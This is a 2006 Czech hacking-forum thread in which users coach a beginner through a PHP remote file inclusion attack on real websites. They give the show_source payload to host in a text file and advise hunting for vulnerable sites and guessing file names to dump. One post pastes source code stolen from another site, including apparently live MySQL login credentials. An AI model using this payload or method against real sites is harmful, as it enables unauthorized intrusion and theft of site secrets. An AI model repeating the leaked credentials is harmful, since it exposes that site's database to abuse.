php injekce

HackForum

php injekce#
NO chtel sem se zeptat jakej by mel bejt postup při aplikování injekce napsal jsem so souboru script.txt tento script show_source("ramme.php") ramme jsem napsal protože se tak jemnuje jejich hlavní stránka a melo by mi to vypsat co nikdy jsem to nedelal tak nevim...asi bych vam tu mel nechat jeste linku

[link] nevim přesně co by se tam melo zobrazit tak mi napiste jestli to mam dobra nebo spatne a v cem spociva ta chyba..dikys
(odpovědět)
php injekce11.6.2006 13:50
re: php injekce#
a do toho TXTaku si napisal aj <?php ?:D

----------
Who is Tyler Durden ?
(odpovědět)
ChreNik | E-mail | ICQ 22523378311.6.2006 13:58
re: php injekce#
Chlape... Ta stránka kterou si uvedl neobsahuje include ale rám... :) Najdi si jinou stránku, protože vždy, když se ti zobrazí zdroják a neprovede se, není to include :)
(odpovědět)
()Suprer() | E-mail | ICQ 273-308-79111.6.2006 13:59
re: php injekce#
Přiznám se: tu stránku jsem taky kdysi zkoušel...
(odpovědět)
()Suprer() | E-mail | ICQ 273-308-79111.6.2006 14:00
re: php injekce#
Jinak přesně jak řekl ChreNik: do toho script3.txt dej:

<?
show_source("index.php")
?>
(odpovědět)
()Suprer() | E-mail | ICQ 273-308-79111.6.2006 14:02
re: php injekce#
...a za fci strednik.
(odpovědět)
Emkei | E-mail | Website | PGP11.6.2006 14:27
re: php injekce#
jo jasne dikys
(odpovědět)
sss11.6.2006 14:03
re: php injekce#
jeste se zeptam jinak jakkym scriptem docilily toho že se jim na teto starnce zobrazilo toto

<?php
$SQL_Server = "localhost";
$SQL_Uzivatel = "aukce-burza.cz";
$SQL_Heslo = "jetingue";
$Databaze = "aukce-burza_cz";

$pripoj=MySQL_Connect($SQL_Server, $SQL_Uzivatel, $SQL_Heslo) or Die(MySQL_Error());
MySQL_Select_Db($Databaze) or Die(MySQL_Error());
$set = @mysql_query ('SET NAMES CP1250');
?>
<?php
error_reporting(0);
Function Title(){
$a = $_REQUEST['a'];
if ($a == null) print "";
else print " - $a";}
?>



jakym scriptem toho docilili
(odpovědět)
ssss11.6.2006 14:10
re: php injekce#
No právě tou funkcí
show_source()
Akorát musíš najít správný web, chápeš?
(odpovědět)
()Suprer() | E-mail | ICQ 273-308-79111.6.2006 14:21
re: php injekce#
no jasne ale skusil jsem to na tom co je v users textu v tom komentari je link jemu se to tam zobrazilo ale me ne
(odpovědět)
ssss11.6.2006 14:24
re: php injekce#
[link]


koukni a rekni kde je chyba ja myslim ze nikde jedine ze by to tam uz nikdo zaplatoval
(odpovědět)
ssss11.6.2006 14:26
re: php injekce#
V tom svym souboru scriptik.txt musis mit nasledujici kod:
<?php
show_source("index.php");
?>
...a nauc se PHP, jinak je to o nicem.
(odpovědět)
Emkei | E-mail | Website | PGP11.6.2006 14:30
re: php injekce#
jo jasne diky.jeste bych se chtel zeptat na to jak prisel studna na tohle
<?php
show_source('nastaveni.php');
na tenhle nazev nastaveni

show_source('seo.inc'); a co přesne znamena seo.inc co to je za soubory kde vykomal ty jmena nebo spis jak
?>

(odpovědět)
ssss11.6.2006 14:37
re: php injekce#
jo vpohode uz vim kde to vzal vsechno spociva v zakladnim scriptiku a potom se to odnej jen odviji jasne dik za pomoc
(odpovědět)
ssss11.6.2006 14:41
re: php injekce#
show_source('seo.inc'); jen ješte tohle to vubec nechapu jak na to prisel ja sem se tm koukal a seo.inc sem z toho nevykoukal jedine ze by to bylo neco spojeneho s php...lol budu se muset pustit do uceni..
(odpovědět)
ssss11.6.2006 14:48
re: php injekce#
Predpokladam ze inc je zkratka z include, a jedna se nejspise jen o dalsi includovany soubor. Pokud se mylim tak me opravdne, v php nejsem moc zbehly.

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t11.6.2006 19:09
re: php injekce#
Podle nazvu toho scriptu (seo.inc) a funkce Title() se IMHO jedna pouze o script na zvyseni page ranku, cehoz lze podle SEO dosahnout tim, ze kazda stranka bude mit jiny titulek, nic vic...
(odpovědět)
Emkei | E-mail | Website | PGP11.6.2006 23:11

Zpět
 
 
 

 
BBCode